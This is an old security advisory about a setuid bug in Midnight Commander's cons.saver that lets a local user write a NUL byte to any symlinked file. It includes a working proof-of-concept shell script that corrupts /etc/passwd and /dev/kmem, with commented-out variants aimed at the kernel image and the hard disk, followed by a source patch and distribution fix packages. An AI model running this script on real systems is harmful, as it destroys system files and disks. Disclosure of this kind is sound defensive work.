|
Vulnerability cons.saver Affected cons.saver Description Maurycy Prodeus found following. Many systems have a suid on cons.saver which is part of midnight commander package. Standard location of this binary is /usr/lib/mc/bin/cons.saver. There is a bug, which allows luser to write '\0' char to any symlinkable file in system. So it can be very destructive, Maurycy wrote simple example of DoS. Technical details ... it isn't common bug. Cons.saver doesn't check if stdout is opened. Next, it checks if argv[1] is a terminal file. First, file is opened with O_RDWR flag and then it checks if this file is character device. When error occures, cons.saver doesn't close this file. Later, NULL character is written to 1 fd. (our 'fake' stdout) Proof of concept: #!/bin/sh # *---------------------------------------------------------* # Slaughterhouse ver. 1.0 by z33d@eth-security.net (C) 2000 | # Bloody, Midnight DoS ;> with suid cons.saver # Dedicated to my lovely mother. # : Greetz # * (...) Oczy niebieskie (...) # - y3t1 - twe zyczenie jest dla mnie rozkazem :) # - wroclaw's killers <=> dyziu, decker, kanedaa, korie, viedzmin (...) # - argante development team (lcamtuf,bulba,artur,marcin,bikappa,honey ...) # - #sigsegv (funkysh, y3t1, cliph, detergent, kris, venglin ...) # - sister of night # - other ppl like mareczek, grubszy, karol, adam, wojtas, siebylnikov, # slodka Asia (...) | # *---------------------------------------------------------* if [ -u /usr/lib/mc/bin/cons.saver ]; then echo "Zdarza sie." else echo "Swoja matke przepros ..." exit 0 fi cat >/tmp/rzeznia.c <<_eof_ #include <stdio.h> #include <unistd.h> main(){ close(0); close(1); execl("/usr/lib/mc/bin/cons.saver","cons.saver","/tmp/tty13",NULL); printf("To jakies fatalne nieporozumienie...\n");} _eof_ gcc /tmp/rzeznia.c -o /tmp/rzeznia rm -f /tmp/rzeznia.c if [ -x /tmp/rzeznia ]; then echo "On naostrzyl juz noz ... mial rowek i trojkatny ksztalt" else echo "ZZZZZZz Zyz yzyzyyzyzyzyzyyy y y . . ." exit 0 fi ln -s /etc/passwd /tmp/tty13 /tmp/rzeznia rm -f /tmp/tty13 ln -s /dev/kmem /tmp/tty13 /tmp/rzeznia rm -f /tmp/tty13 # Uzyj w razie potrzeby ;> # ln -s /boot/vmlinuz /tmp/tty13 # /tmp/rzeznia # rm -f /tmp/tty13 # ln -s /dev/hda /tmp/tty13 # /tmp/rzeznia echo "... " echo " he passed away" rm -f /tmp/rzeznia Solution z33d wrote temporary patch, but Solar's OpenWall Patch should be enough: --- mc-4.5.42/src/cons.saver.c Mon Dec 6 18:50:02 1999 +++ mc-4.5.42/src/cons.saver.c.z33d Sun Nov 12 17:20:48 2000 @@ -116,12 +116,15 @@ if (fd == -1) return -1; - if (fstat (fd, &stat_buf) == -1) + if (fstat (fd, &stat_buf) == -1){ + close(fd); return -1; + } /* Must be character device */ if (!S_ISCHR (stat_buf.st_mode)){ *msg = "Not a character device"; + close(fd); return -1; } @@ -132,17 +135,20 @@ /* Second time: must be console */ if ((stat_buf.st_rdev & 0xff00) != 0x0400){ *msg = "Not a console"; + close(fd); return -1; } if ((stat_buf.st_rdev & 0x00ff) > 63){ *msg = "Minor device number too big"; + close(fd); return -1; } /* Must be owned by the user */ if (stat_buf.st_uid != getuid ()){ *msg = "Not a owner"; + close(fd); return -1; } } For Debian: http://security.debian.org/dists/stable/updates/main/source/mc_4.5.42-11.potato.5.diff.gz http://security.debian.org/dists/stable/updates/main/source/mc_4.5.42-11.potato.5.dsc http://security.debian.org/dists/stable/updates/main/source/mc_4.5.42.orig.tar.gz http://security.debian.org/dists/stable/updates/main/binary-alpha/gmc_4.5.42-11.potato.5_alpha.deb http://security.debian.org/dists/stable/updates/main/binary-alpha/mc-common_4.5.42-11.potato.5_alpha.deb http://security.debian.org/dists/stable/updates/main/binary-alpha/mc_4.5.42-11.potato.5_alpha.deb http://security.debian.org/dists/stable/updates/main/binary-arm/gmc_4.5.42-11.potato.5_arm.deb http://security.debian.org/dists/stable/updates/main/binary-arm/mc-common_4.5.42-11.potato.5_arm.deb http://security.debian.org/dists/stable/updates/main/binary-arm/mc_4.5.42-11.potato.5_arm.deb http://security.debian.org/dists/stable/updates/main/binary-i386/gmc_4.5.42-11.potato.5_i386.deb http://security.debian.org/dists/stable/updates/main/binary-i386/mc-common_4.5.42-11.potato.5_i386.deb http://security.debian.org/dists/stable/updates/main/binary-i386/mc_4.5.42-11.potato.5_i386.deb http://security.debian.org/dists/stable/updates/main/binary-m68k/gmc_4.5.42-11.potato.5_m68k.deb http://security.debian.org/dists/stable/updates/main/binary-m68k/mc-common_4.5.42-11.potato.5_m68k.deb http://security.debian.org/dists/stable/updates/main/binary-m68k/mc_4.5.42-11.potato.5_m68k.deb http://security.debian.org/dists/stable/updates/main/binary-powerpc/gmc_4.5.42-11.potato.5_powerpc.deb http://security.debian.org/dists/stable/updates/main/binary-powerpc/mc-common_4.5.42-11.potato.5_powerpc.deb http://security.debian.org/dists/stable/updates/main/binary-powerpc/mc_4.5.42-11.potato.5_powerpc.deb http://security.debian.org/dists/stable/updates/main/binary-sparc/gmc_4.5.42-11.potato.5_sparc.deb http://security.debian.org/dists/stable/updates/main/binary-sparc/mc-common_4.5.42-11.potato.5_sparc.deb http://security.debian.org/dists/stable/updates/main/binary-sparc/mc_4.5.42-11.potato.5_sparc.deb For Linux-Mandrake: Linux-Mandrake 6.0: 6.0/RPMS/gmc-4.5.31-14.1mdk.i586.rpm 6.0/RPMS/mc-4.5.31-14.1mdk.i586.rpm 6.0/RPMS/mcserv-4.5.31-14.1mdk.i586.rpm 6.0/SRPMS/mc-4.5.31-14.1mdk.src.rpm Linux-Mandrake 6.1: 6.1/RPMS/gmc-4.5.38-4.1mdk.i586.rpm 6.1/RPMS/mc-4.5.38-4.1mdk.i586.rpm 6.1/RPMS/mcserv-4.5.38-4.1mdk.i586.rpm 6.1/SRPMS/mc-4.5.38-4.1mdk.src.rpm Linux-Mandrake 7.0: 7.0/RPMS/gmc-4.5.42-4.1mdk.i586.rpm 7.0/RPMS/mc-4.5.42-4.1mdk.i586.rpm 7.0/RPMS/mcserv-4.5.42-4.1mdk.i586.rpm 7.0/SRPMS/mc-4.5.42-4.1mdk.src.rpm Linux-Mandrake 7.1: 7.1/RPMS/gmc-4.5.46-1.1mdk.i586.rpm 7.1/RPMS/mc-4.5.46-1.1mdk.i586.rpm 7.1/RPMS/mcserv-4.5.46-1.1mdk.i586.rpm 7.1/SRPMS/mc-4.5.46-1.1mdk.src.rpm Linux-Mandrake 7.2: 7.2/RPMS/gmc-4.5.51-7.1mdk.i586.rpm 7.2/RPMS/mc-4.5.51-7.1mdk.i586.rpm 7.2/RPMS/mcserv-4.5.51-7.1mdk.i586.rpm 7.2/SRPMS/mc-4.5.51-7.1mdk.src.rpm